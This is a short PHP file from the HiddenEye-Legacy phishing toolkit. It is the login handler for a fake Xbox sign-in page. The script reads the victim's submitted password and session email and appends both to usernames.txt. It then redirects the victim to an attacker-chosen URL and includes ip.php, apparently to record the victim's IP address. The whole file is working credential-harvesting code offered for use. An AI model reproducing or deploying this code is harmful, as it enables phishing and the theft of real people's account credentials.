HiddenEye-Legacy/WebPages/xbox/login.php

11 lines
274 B
PHP
Raw Normal View History

<?php
include 'ip.php';
session_start();
$pass = $_POST["passwd"];
$email=$_SESSION["Email"];
file_put_contents("usernames.txt", "[EMAIL]: " . $email . " [PASS]: " . $pass . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();
session_destroy();
?>